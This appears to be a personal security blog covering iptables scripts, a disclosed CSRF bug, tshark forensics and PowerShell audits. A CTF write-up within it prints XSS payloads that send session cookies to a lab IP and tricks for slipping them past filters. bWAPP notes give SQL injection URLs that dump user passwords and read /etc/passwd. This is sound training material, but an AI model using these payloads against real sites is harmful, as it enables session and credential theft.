iptables -A FORWARD -i eth0 -o eth1.20 -p tcp -d 10.20.0.0/24 --sport 80 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.20 -o eth0 -p tcp -s 10.20.0.0/24 --dport 443 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.20 -p tcp -d 10.20.0.0/24 --sport 443 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT

# Forward eth1.30 to eth0 and back
iptables -A FORWARD -i eth1.30 -o eth0 -p udp -s 10.30.0.0/24 -d 75.75.75.75 --dport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.30 -p udp -d 10.30.0.0/24 -s 75.75.75.75 --sport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.30 -o eth0 -p tcp -s 10.30.0.0/24 --dport 80 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.30 -p tcp -d 10.30.0.0/24 --sport 80 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.30 -o eth0 -p tcp -s 10.30.0.0/24 --dport 443 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.30 -p tcp -d 10.30.0.0/24 --sport 443 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -j FORWARD_DROP

# Output from eth0 to WAN
# DNS to 75.75.75.75 or root servers
iptables -A OUTPUT -o eth0 -p udp -s 172.20.5.254 -d 75.75.75.75 --dport 53 -j LAN_ACCEPT
iptables -A INPUT -i eth0 -p udp -d 172.20.5.254 -s 75.75.75.75 --sport 53 -j LAN_ACCEPT

#iptables -N LOGGING
#iptables -A INPUT -j LOGGING
#iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTABLES: " --log-level 7
#iptables -A LOGGING -j DROP

iptables -A WAN_ACCEPT -m limit --limit 2/min -j LOG --log-prefix "WAN-ACCEPT " --log-level 6
iptables -A WAN_ACCEPT -j ACCEPT 

iptables -A LAN_ACCEPT -m limit --limit 2/min -j LOG --log-prefix "LAN-ACCEPT " --log-level 6
iptables -A LAN_ACCEPT -j ACCEPT 

iptables -A LOG_FORWARD_ACCEPT -m limit --limit 2/min -j LOG --log-prefix "FORWARD-ACCEPT " --log-level 6
iptables -A LOG_FORWARD_ACCEPT -j ACCEPT 

iptables -A INPUT -i eth0 -j WAN_INPUT_DROP
iptables -A INPUT -i eth1.10 -j LAN_INPUT_DROP
iptables -A INPUT -i eth1.20 -j LAN_INPUT_DROP
iptables -A INPUT -i eth1.30 -j LAN_INPUT_DROP

iptables -A OUTPUT -o eth0 -j WAN_OUTPUT_DROP
iptables -A OUTPUT -o eth1.10 -j LAN_OUTPUT_DROP
iptables -A OUTPUT -o eth1.20 -j LAN_OUTPUT_DROP
iptables -A OUTPUT -o eth1.30 -j LAN_OUTPUT_DROP

iptables -A WAN_INPUT_DROP -m limit --limit 2/min -j LOG --log-prefix "WAN_INPUT_DROP " --log-level 6
iptables -A WAN_INPUT_DROP -j DROP 

iptables -A WAN_OUTPUT_DROP -m limit --limit 2/min -j LOG --log-prefix "WAN_OUTPUT_DROP " --log-level 6
iptables -A WAN_OUTPUT_DROP -j DROP 

iptables -A LAN_INPUT_DROP -m limit --limit 2/min -j LOG --log-prefix "LAN_INPUT_DROP " --log-level 6
iptables -A LAN_INPUT_DROP -j DROP

iptables -A LAN_OUTPUT_DROP -m limit --limit 2/min -j LOG --log-prefix "LAN_OUTPUT_DROP " --log-level 6
iptables -A LAN_OUTPUT_DROP -j DROP

iptables -A FORWARD_DROP -m limit --limit 2/min -j LOG --log-prefix "FORWARD_DROP " --log-level 6
iptables -A FORWARD_DROP -j DROP

Sunday, March 13, 2016

Weevely - PHP Backdoor

Recently at BSides SLC 2016 I had a class which introduced the usage of Weevely.  Here are a couple of links that complemented the training that I had:

http://exploiterz.blogspot.com/2013/09/how-to-backdoor-webserver-using-weevely.html

http://null-byte.wonderhowto.com/forum/hiob-generate-web-backdoors-php-using-weevely-kali-linux-0158905/

Saturday, March 12, 2016

Simple Script to Configure iptables

I have been utilizing Cloud at Cost to put together a variety of labs.  I built the iptables script below to configure a base installation until I can configure it further.





#!/bin/bash

# Space-separated lists of ports to allow inbound
allowedTCPInbound="22"
#allowedUDPInbound="53"

# Flush all rules, delete user chains and zero the counters
iptables -F
iptables -X
iptables -Z

# Default deny inbound and forwarded traffic, allow outbound
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT ACCEPT

iptables -A INPUT -s 127.0.0.1 -j ACCEPT
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

for port in $allowedTCPInbound; do
 #iptables -A INPUT -p tcp --dport $port -j LOG --log-prefix '*** Allowed TCP Connection ***'
 iptables -A INPUT -p tcp --dport $port -j ACCEPT
done

#for port in $allowedUDPInbound; do
# iptables -A INPUT -p udp --dport $port -j LOG --log-prefix '*** Allowed UDP Connection ***'
# iptables -A INPUT -p udp --dport $port -j ACCEPT
#done

# Dropped without logging: the volume of broadcast/discovery traffic on the
# hosting network would otherwise fill the log
iptables -A INPUT -p udp --dport 67 -j DROP     # DHCP/BOOTP server port broadcasts
iptables -A INPUT -p udp --dport 137 -j DROP    # NetBIOS name service
iptables -A INPUT -p udp --dport 138 -j DROP    # NetBIOS datagram service
iptables -A INPUT -p tcp --dport 139 -j DROP    # NetBIOS session service
iptables -A INPUT -p tcp --dport 445 -j DROP    # SMB
iptables -A INPUT -p udp --dport 9181 -j DROP   # other broadcast traffic observed on the network
iptables -A INPUT -p udp --dport 17500 -j DROP  # Dropbox LAN sync discovery broadcasts
iptables -A INPUT -p udp --dport 32412 -j DROP  # Plex Server UDP device discovery
iptables -A INPUT -p udp --dport 32414 -j DROP  # Plex Server UDP device discovery

# Everything else is logged before the INPUT DROP policy discards it
iptables -A INPUT -p tcp -j LOG --log-prefix '*** DROP TCP Connection ***'
iptables -A INPUT -p udp -j LOG --log-prefix '*** DROP UDP Connection ***'
iptables -A INPUT -p icmp -j LOG --log-prefix '*** DROP ICMP Connection ***'




You can also download it from here.

BSides 2016 Hackers Challenge

At BSides 2016 I participated in their Hackers Challenge.  The challenges were based on reverse engineering, network packet analysis, and many other puzzles that you needed to figure out.  When I hit the wall at 3AM on March 11th I was in 2nd place.  By the end of the competition at 10AM I had dropped to 7th.  The challenge was great! Thanks BSides...

Check out the django.nV project.  This is a project that was used in the Hackers Challenge but was adapted from its original state.

Screenshot of being in 2nd place at 3AM.


Screenshot of being in 7th place at the end of the competition.



One thing to note is that most of the challenges were worth 4,000 points at the start.  If you completed a challenge and nobody else did, you kept all 4,000 points; otherwise the points were divided among every participant who completed it.

Responsible Disclosure of CSRF in PHP Fusion 9

Recently I did some testing with PHP Fusion 9 and found that I could create additional users while the admin was logged in, because the application did not protect against CSRF.  I reached out to the development team and they had it fixed within 72 hours.  Below is the original video that I sent them; they then provided one back showing that they had fixed it and asking for it to be tested again.

Video - Adding a user account through CSRF




Then here is the response about fixing the vulnerability in version 9.
Here is the YouTube video that he posted, as shown in the screenshot above:  https://www.youtube.com/watch?v=5eLfA_ZEujQ&feature=youtu.be



Forensics - Mount Windows Partition Showing the System Files

Mount a Windows (NTFS) partition read-only with the NTFS metafiles ($MFT, $LogFile and so on) visible and alternate data streams reachable through the file:stream syntax (show_sys_files and streams_interface=windows are ntfs-3g mount options):
mount -o ro,show_sys_files,streams_interface=windows /dev/sdb2 /mnt/analysis

Taken from "Super Time Line Analysis - SANS DFIR Webcast" https://www.youtube.com/watch?v=C4jNfXZ90fw


CyberSecurity Challenge Australia 2014 In a Box - YAWU - Yet Another Write-up

This challenge can be downloaded from vulnhub.com.

Web Application Pentest Section

80 points - Only VIP and registered users are allowed to view the Blog. Become VIP to gain access to the Blog to reveal the hidden flag.

Looking at the web page, we notice that when the page is first visited the link to the "Blog" is disabled.  Somehow we need to re-enable the link to get the flag.


Below is a Python script to quickly send a GET request to the index.py page.



Notice that among the cookies returned is vip=0.  From this you can assume that a VIP user will have a value other than 0.  If I modify it to 1, the link to the Blog becomes enabled, and clicking the Blog link reveals the flag.




160 points - Gain access to the Blog as a registered user to reveal the hidden flag.

The blog allows you to insert comments, so the next check is whether XSS is possible when a comment is inserted.  At the bottom of the textbox you can see how to make text bold or italicized and how to add a link.  Testing the link feature shows that the link title is where we can place the XSS.
With this understanding we can now include XSS in the page to pull the session cookies of other visitors to the page.  Tried the following in a link title tag:

[<SCRIPT type="text/javascript">var adr = 'http://172.16.102.1/test.php?cookie=' + escape(document.cookie);</SCRIPT>](Test)

The script above was filtered and not posted as a comment.  Trying a different encoding (URL encoded):

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F172.16.102.1%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

This time the comment did post as a link; however, the IP address is truncated after the first octet.  Going to encode the IP address further by URL-encoding the periods as well.

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F172%2E16%2E102%2E1%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

Tried the above and the filter still caught the encoded IP address.  I needed another way to encode the IP address and found the following:


This is interesting. The link in this page appears as the following:

<a id="ctl00_ctl00_WholeBody_ContentPane_ContentArea_Body_encCrazyIp" href="http://2886755841" style="font-weight:bold;">2886755841</a>


Below is a Python script that I found to convert an IP address to its decimal-encoded form.

#!/usr/bin/env python3

import socket, struct
# inet_aton packs the dotted quad into 4 network-order bytes; "!I" reads them back as one unsigned 32-bit integer
print(struct.unpack("!I", socket.inet_aton("172.16.102.1"))[0])
Output: 2886755841

With the encoded IP address I changed the comment to the following; however, I noticed that the comment is truncated to just 50+ characters:

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F2886755841%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

So the following does pull the PHPSESSID:

[<script>document.location='http://2886755841/?c='+document.cookie;</script>](Test)

However this redirects the user and does not do it blindly. (The below does not work.)

[<script src='http://2886755841/?c='+document.cookie></script>](Test)
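Two things from this section are worth keeping as code: the dotted-quad to decimal conversion from the script above, and the lesson that a comment filter which only looks for dotted-quad IP addresses lets the decimal form straight through. As an added example (my own, not the challenge's code), the Python below does the conversion in both directions and normalises the host of a submitted link back to a dotted quad before any check is applied. It goes one step beyond the page by also accepting the 0x-hex form, which browsers likewise resolve as an IPv4 literal (an assumption worth confirming for the client you care about); the helper names normalize_url_host and is_obfuscated_ip_link are mine.

```python
import ipaddress
import re
import socket
import struct
from urllib.parse import urlsplit

DECIMAL_RE = re.compile(r"^[1-9][0-9]*$")       # e.g. 2886755841 (no leading zeros)
HEX_RE = re.compile(r"^0[xX][0-9a-fA-F]+$")     # e.g. 0xac106601


def ip_to_decimal(dotted):
    """Dotted quad -> 32-bit integer (the same struct/socket trick as the script above)."""
    return struct.unpack("!I", socket.inet_aton(dotted))[0]


def decimal_to_ip(value):
    """32-bit integer -> dotted quad."""
    return socket.inet_ntoa(struct.pack("!I", value))


def host_to_ipv4(host):
    """Return the dotted-quad form if `host` is an IPv4 literal written as a
    dotted quad, a plain decimal number or a 0x-hex number (forms a browser
    resolves without DNS); return None for an ordinary hostname."""
    try:
        # Strict dotted-quad parse: rejects octets above 255 and leading zeros.
        return str(ipaddress.IPv4Address(host))
    except ipaddress.AddressValueError:
        pass
    if DECIMAL_RE.match(host):
        n = int(host, 10)
    elif HEX_RE.match(host):
        n = int(host, 16)
    else:
        return None
    return decimal_to_ip(n) if n <= 0xFFFFFFFF else None


def normalize_url_host(url):
    """Return (host as written, dotted quad or None) for the host part of a URL."""
    host = urlsplit(url).hostname or ""
    return host, host_to_ipv4(host)


def is_obfuscated_ip_link(url):
    """True when the URL's host is an IP literal that is not written as a dotted
    quad, which a filter matching only dotted quads would miss."""
    host, ip = normalize_url_host(url)
    return ip is not None and ip != host


if __name__ == "__main__":
    print(ip_to_decimal("172.16.102.1"))                  # 2886755841
    print(normalize_url_host("http://2886755841/?c="))    # ('2886755841', '172.16.102.1')
```

The point for a filter author is the order of operations: normalise first, then apply whatever address check you have; a deny-list keyed on the dotted form is only as good as the canonicalisation in front of it.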






220 points - Retrieve the hidden flag from the database.



260 points - Retrieve the hidden flag by gaining access to the caching control panel.



280 points - Reveal the final flag, which is hidden in the /flag.txt file on the web server.

cmd.exe Count Lines returned with netstat from the command line

I was testing the connection-count threshold of a web server and threw together a DOS command to accomplish the minor task.  In the command prompt I executed:

netstat -an | find /i "<ip address>" | find /N /i "ESTABLISHED"

tshark - More than I ever wanted to know...

Recently I purchased the book "The Practice of Network Security Monitoring" by Richard Bejtlich.  In chapter 7 of the book he discusses the Digital Corpora project located at http://www.digitalcorpora.org and presents the "Nitroba University Harassment Scenario".  A pcap can be downloaded in which a teacher is being harassed by a student, and the object of the scenario is to identify who did it and with what evidence.  The scenario and the files you need are located at the following link.

In the book the scenario is used to explain and teach the tool Xplico.  However, I am going to use the scenario to identify useful tshark commands for such an investigation.

The first lead in the investigation is that of an IP Address.  "The mail header shows that the mail message originated from the IP address 140.247.62.34, which is a Nitroba student dorm room. "

IP Address: 140.247.62.34.  I am going to use tshark to isolate all traffic with that IP address as the source or destination and save it to another pcap.

tshark -r nitroba.pcap -Y "ip.src==140.247.62.34 or ip.dst==140.247.62.34" -w 140_247_62_34.pcap

The above tshark command reads like this:
-r nitroba.pcap - Read the nitroba.pcap file
-Y "ip.src==140.247.62.34 or ip.dst==140.247.62.34" - Display filter: keep only packets whose source or destination is 140.247.62.34
-w 140_247_62_34.pcap - Write the matching packets to this file

From the extracted packets the IP address 192.168.15.4 is observed, which is a private, non-routable address.  That makes me wonder how many private non-routable IP addresses there are in the packet capture:

tshark -r nitroba.pcap -T fields -e ip.src > ip-src.txt

The above tshark command reads like this:
-T fields - Sets the output to that of fields
-e ip.src - Defines which fields to output
> ip-src.txt - Redirects the output to a text file

$ cat ip-src.txt | sort | uniq -c | sort -n | grep -e " 172\." -e " 192\.168\." -e " 10\."
      2 192.168.15.2
      3 192.168.15.7
      6 192.168.15.8
      8 10.0.1.5
     14 192.168.15.5
     16 192.168.1.5
   1486 192.168.1.254
   2154 192.168.15.1
   6818 192.168.1.64
  34554 192.168.15.4

The above command takes the source IP addresses from the file, sorts them, uses uniq -c to count the instances of each address (the count is placed in front of the IP), sorts by frequency, and finally greps out the private IP address ranges.

We can tell the busiest device is 192.168.15.4.  Let's look into the devices more and try to determine what they are.  I am going to use the MAC address of each device to identify the vendor that manufactured it.

tshark -r nitroba.pcap -T fields -e ip.src -e eth.src > ip-src-and-mac-src.txt
cat ip-src-and-mac-src.txt | sort | uniq -c | sort -rn | grep -e " 172\." -e " 192\.168\." -e " 10\."

  count  ip.src         eth.src            vendor
  34554  192.168.15.4   00:17:f2:e2:c0:ce  Apple
   6814  192.168.1.64   00:1d:d9:2e:4f:61  Hon Hai Precision
   2154  192.168.15.1   00:1d:d9:2e:4f:60  Hon Hai Precision
   1161  192.168.1.254  00:1d:d9:2e:4f:60  Hon Hai Precision
    325  192.168.1.254  00:1d:6b:99:98:68  Arris Group
     16  192.168.1.5    00:0a:95:69:38:cc  Apple
     14  192.168.15.5   00:14:d1:44:a0:f1  Trendnet
      8  10.0.1.5       00:1c:b3:79:00:31  Apple
      6  192.168.15.8   00:16:cb:b4:a3:f8  Apple
      4  192.168.1.64   00:1f:f3:5a:77:9b  Apple
      3  192.168.15.7   00:1c:b3:79:00:31  Apple
      2  192.168.15.2   00:1b:63:f1:8a:6e  Apple

Adding the source Ethernet address shows that there are 12 devices we should gather knowledge about, not just the 10 suggested by the IP addresses alone.  The IP addresses with more than one MAC address associated with them are 192.168.1.64 and 192.168.1.254, and I have included the manufacturer next to each MAC address.

The MAC address 00:1c:b3:79:00:31 is also found to have used 2 IP addresses: 10.0.1.5 and 192.168.15.7.

192.168.1.64 is the gateway
192.168.1.254 is the DNS Server
192.168.15.1 is the inside of the gateway
192.168.15.4 is the main IP of interest
192.168.15.5 is nothing
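The sort | uniq -c | sort -rn | grep pipeline and the IP-to-MAC pairing above are the kind of triage that is worth scripting, and the grep has a catch: " 172\." also matches 172.32.x.x and upward, which is public space. As an added example (mine, not from the book or the tshark output above), the Python below reads `tshark -T fields -e ip.src -e eth.src` output, counts (IP, MAC) pairs restricted to the real RFC 1918 blocks, and reports the two anomalies the write-up spotted by hand: IPs seen behind more than one MAC and MACs that used more than one IP. The sample lines are constructed: a few pairs from the table above, plus 172.16.0.9 and 172.32.0.9 on one MAC and the public 140.247.62.34 to exercise the range test.

```python
import ipaddress
from collections import Counter, defaultdict

# Constructed sample of `tshark -r nitroba.pcap -T fields -e ip.src -e eth.src`
# output: tab-separated, one line per packet. A frame without an IP layer
# (ARP, for instance) leaves the ip.src column empty.
SAMPLE_FIELDS = """\
192.168.15.4\t00:17:f2:e2:c0:ce
192.168.15.4\t00:17:f2:e2:c0:ce
192.168.1.64\t00:1d:d9:2e:4f:61
192.168.1.64\t00:1f:f3:5a:77:9b
10.0.1.5\t00:1c:b3:79:00:31
192.168.15.7\t00:1c:b3:79:00:31
172.16.0.9\t00:1d:6b:99:98:68
172.32.0.9\t00:1d:6b:99:98:68
140.247.62.34\t00:1d:d9:2e:4f:60
\t00:1d:d9:2e:4f:60
"""

# Exact RFC 1918 membership instead of the shell pipeline's " 172\." prefix match.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1918(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in RFC1918)


def parse_fields(text):
    """Turn tshark -T fields output into (ip.src, eth.src) pairs, dropping non-IP frames."""
    pairs = []
    for line in text.splitlines():
        cols = line.split("\t")
        if len(cols) != 2 or not cols[0]:
            continue
        # A packet carrying two IP headers (an ICMP error, for example) prints
        # both values comma-separated; keep the outer one.
        pairs.append((cols[0].split(",")[0], cols[1].lower()))
    return pairs


def count_private_pairs(pairs):
    """Equivalent of sort | uniq -c | sort -rn | grep <private ranges>, with an exact RFC 1918 test."""
    return Counter(p for p in pairs if is_rfc1918(p[0]))


def ips_with_multiple_macs(counter):
    """IPs seen behind more than one MAC (DHCP reuse, or a gateway/NAT rewriting addresses)."""
    macs = defaultdict(set)
    for ip, mac in counter:
        macs[ip].add(mac)
    return {ip: sorted(m) for ip, m in macs.items() if len(m) > 1}


def macs_with_multiple_ips(counter):
    """MACs that used more than one IP (the same device moving between networks)."""
    ips = defaultdict(set)
    for ip, mac in counter:
        ips[mac].add(ip)
    return {mac: sorted(i) for mac, i in ips.items() if len(i) > 1}


if __name__ == "__main__":
    counts = count_private_pairs(parse_fields(SAMPLE_FIELDS))
    for (ip, mac), n in counts.most_common():
        print(f"{n:7d} {ip:15} {mac}")
    print("IPs with several MACs:", ips_with_multiple_macs(counts))
    print("MACs with several IPs:", macs_with_multiple_ips(counts))
```

Feeding it the real ip-src-and-mac-src.txt reproduces the table above and flags 192.168.1.64, 192.168.1.254 and 00:1c:b3:79:00:31 automatically; the vendor column would come from an OUI lookup, which is left out to keep the script offline.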


Did not complete the scenario...

File and Folder Auditing with Powershell

http://blogs.technet.com/b/zarkatech/archive/2012/01/14/audit-file-server-permissions-using-powershell.aspx


$ErrorActionPreference = "Continue"
$strComputer = $env:ComputerName
$colDrives = Get-PSDrive -PSProvider Filesystem   # not used below; carried over from the original script
    $StartPath = "\\myserver\share"
    # Walk the share and emit one CSV row per access control entry on each file and folder
    Get-ChildItem -LiteralPath $StartPath -Recurse |
    ForEach {
      $FullPath = Get-Item -LiteralPath (Get-Item -LiteralPath $_.PSPath)
      (Get-Item -LiteralPath $FullPath).GetAccessControl() |
      Select * -Expand Access |
      Select @{N='Server Name';E={$strComputer}},
             @{N='Full Path';E={$FullPath}},
             @{N='Type';E={If($FullPath.PSIsContainer -eq $True) {'D'} Else {'F'}}},
             @{N='Owner';E={$_.Owner}},
             @{N='Trustee';E={$_.IdentityReference}} } |
             # Extra ACE columns from the original script; to re-enable them, uncomment and move the closing brace to the last one
             #@{N='Inherited';E={$_.IsInherited}},
             #@{N='Inheritance Flags';E={$_.InheritanceFlags}},
             #@{N='Ace Flags';E={$_.PropagationFlags}},
             #@{N='Ace Type';E={$_.AccessControlType}},
             #@{N='Access Masks';E={$_.FileSystemRights}} } |
      Export-CSV -NoTypeInformation -Delimiter "," -Path "$strComputer`_myserver-share.csv"

Friday, March 11, 2016

Audit File and Folder Permissions - Powershell

################################################################################
# AUDIT FILE & FOLDER PERMISSIONS v1.1
# by Roman Zarka | Microsoft Services
################################################################################

$ErrorActionPreference = "Continue"
$strComputer = $env:ComputerName
$colDrives = Get-PSDrive -PSProvider Filesystem 
    $StartPath = "\\server\share"
    Get-ChildItem -LiteralPath $StartPath -Recurse |
    ForEach {
      $FullPath = Get-Item -LiteralPath (Get-Item -LiteralPath $_.PSPath)
      (Get-Item -LiteralPath $FullPath).GetAccessControl() |
      Select * -Expand Access |
      Select @{N='Server Name';E={$strComputer}},
             @{N='Full Path';E={$FullPath}},
             @{N='Type';E={If($FullPath.PSIsContainer -eq $True) {'D'} Else {'F'}}},
             @{N='Owner';E={$_.Owner}},
             @{N='Trustee';E={$_.IdentityReference}} } |
             #@{N='Inherited';E={$_.IsInherited}},
             #@{N='Inheritance Flags';E={$_.InheritanceFlags}},
             #@{N='Ace Flags';E={$_.PropagationFlags}},
             #@{N='Ace Type';E={$_.AccessControlType}},
             #@{N='Access Masks';E={$_.FileSystemRights}} } |
      Export-CSV -NoTypeInformation -Delimiter "," -Path "$strComputer`_share.csv"

Notes from bWAPP v2.2

These are my quick notes that I recorded as I worked through bWAPP v2.2.

--- SQLi GET / Search Results - With security level set to low

URL with SQLi:
http://bwapp/sqli_1.php?title=a' union SELECT 1,table_schema,table_name,4,5,6,7 FROM information_schema.tables WHERE table_schema!='mysql' AND table_schema!='information_schema&action=search

The above query was taken from the MySQL SQL Injection Cheat Sheet located here.  The purpose of this query is to return the schema and table names of the database.  I also had to experiment with the number of columns that were expected and how they were displayed.



Now I need to find out the structure of the tables...

URL for SQLi:
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,table_schema,%20table_name,%204,column_name,6,7%20FROM%20information_schema.columns%20WHERE%20column_name=%27password%27%20AND%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema&action=search

The above SQL injection returns the tables that have a column named password, so now we can formulate our query to begin extracting information.  The query below counts the records in the users table before we extract them, in case a lot of records are available to be extracted.

http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20count%28*%29,%203,%204,%205,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search

This returns that there are 2 records that can be extracted.

http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20login,%20password,%20email,%20admin,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search

The above query returned the login, password, email and if they are an admin of the application in the search results...

--- SQLi GET / Select - With security level set to low...

In this challenge only 1 record is returned at a time because, looking at the code, it does not loop over the recordset that is returned.  This adds a small challenge, but it is not impossible to do the same thing as above.

SQLi URL:
http://bwapp/sqli_2.php?movie=99%20union%20SELECT%201,table_schema,table_name,4,LOAD_FILE%28%27/etc/passwd%27%29,6,7%20FROM%20information_schema.tables%20WHERE%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema%27&action=go

Because movie id 99 does not exist, the single row shown is the first row of the injected SELECT; it also loads the /etc/passwd file so we can gather the user names on the system.

SQL Injection Boolean Based

— The method below would allow for trying each character in a character set until it came back with the correct character...
Iron Man' AND SUBSTRING(@@hostname,1,1) = 'b - Worked
Iron Man' AND SUBSTRING(@@hostname,2,1) = 'W - Worked

— What if we use regular expressions to determine if the letter is between a set of characters...

Iron Man' AND SUBSTRING(@@hostname,1,1) REGEXP '[a-n] - Returns True
Iron Man' AND SUBSTRING(@@hostname,1,1) REGEXP '[a-g] - Returns True
Iron Man' AND SUBSTRING(@@hostname,1,1) REGEXP '[a-c] - Returns True
— This narrows it down to less than 8 queries to figure out the first character of the hostname...  It would have taken 2 or 28 depending on if you started with a-z or A-Z.
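The UNION queries earlier in these notes and the Boolean-based probes just above work for the same reason: the title parameter is spliced into the SQL text, so an unclosed quote in the payload is closed by the quote the application appends. As an added example (mine, not bWAPP's code), the Python block below rebuilds both situations on an in-memory SQLite database with a constructed movies/users schema, runs the page's payload shapes against a string-concatenated query and against a parameterised one, and computes how many range probes one character needs. SQLite has no information_schema or @@hostname, so the payloads read from the constructed users table and sqlite_version() instead, and a regexp() function is registered because SQLite ships without one.

```python
import math
import re
import sqlite3


def build_db():
    """Constructed stand-in for the bWAPP schema: the movies table the search
    page queries and a users table the injection reaches across to."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no built-in REGEXP; 'X REGEXP Y' calls regexp(Y, X) once one is registered.
    conn.create_function(
        "regexp", 2,
        lambda pattern, value: value is not None and re.search(pattern, value) is not None)
    conn.executescript("""
        CREATE TABLE movies(id INTEGER PRIMARY KEY, title TEXT, year INTEGER);
        CREATE TABLE users(id INTEGER PRIMARY KEY, login TEXT, password TEXT, admin INTEGER);
        INSERT INTO movies VALUES (1, 'Iron Man', 2008), (2, 'The Incredible Hulk', 2008);
        INSERT INTO users VALUES (1, 'alice', 'constructed-hash-1', 1), (2, 'zaz', 'constructed-hash-2', 0);
    """)
    return conn


def search_vulnerable(conn, title):
    # Same shape as the search page: the parameter is spliced into the SQL text,
    # and the trailing %' becomes part of whatever string literal the payload leaves open.
    sql = "SELECT id, title, year FROM movies WHERE title LIKE '%" + title + "%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, title):
    # Bound parameter: the whole input, quote and UNION included, is one LIKE pattern.
    return conn.execute("SELECT id, title, year FROM movies WHERE title LIKE ?",
                        ("%" + title + "%",)).fetchall()


def lookup_vulnerable(conn, title):
    # Exact-match variant used by the Boolean-based probes.
    sql = "SELECT title FROM movies WHERE title = '" + title + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, title):
    return conn.execute("SELECT title FROM movies WHERE title = ?", (title,)).fetchall()


# The page's UNION payload shape, adapted to the constructed schema.
UNION_PAYLOAD = "a' UNION SELECT id, login, password FROM users WHERE login != 'zaz"
# Boolean probes; sqlite_version() stands in for @@hostname and always starts with '3'.
BLIND_TRUE = "Iron Man' AND substr(sqlite_version(), 1, 1) = '3"
BLIND_FALSE = "Iron Man' AND substr(sqlite_version(), 1, 1) = '4"
BLIND_REGEXP_TRUE = "Iron Man' AND substr(sqlite_version(), 1, 1) REGEXP '[0-4]"


def probes_needed(charset_size):
    """Queries needed to pin down one character by halving a charset with REGEXP ranges."""
    return math.ceil(math.log2(charset_size))


if __name__ == "__main__":
    db = build_db()
    print("concatenated:", search_vulnerable(db, UNION_PAYLOAD))   # rows from users leak out
    print("parameterised:", search_safe(db, UNION_PAYLOAD))        # []
    print("blind true/false:", lookup_vulnerable(db, BLIND_TRUE), lookup_vulnerable(db, BLIND_FALSE))
    print("probes for a-z:", probes_needed(26), " for 95 printable:", probes_needed(95))
```

The parameterised versions return nothing for every payload because the quote never terminates a literal; that single change closes both the UNION extraction and the character-at-a-time oracle. On the arithmetic: halving a 26-letter alphabet pins a character in 5 probes and the 95 printable ASCII characters in 7, which is where the "less than 8 queries" figure above comes from.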






Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...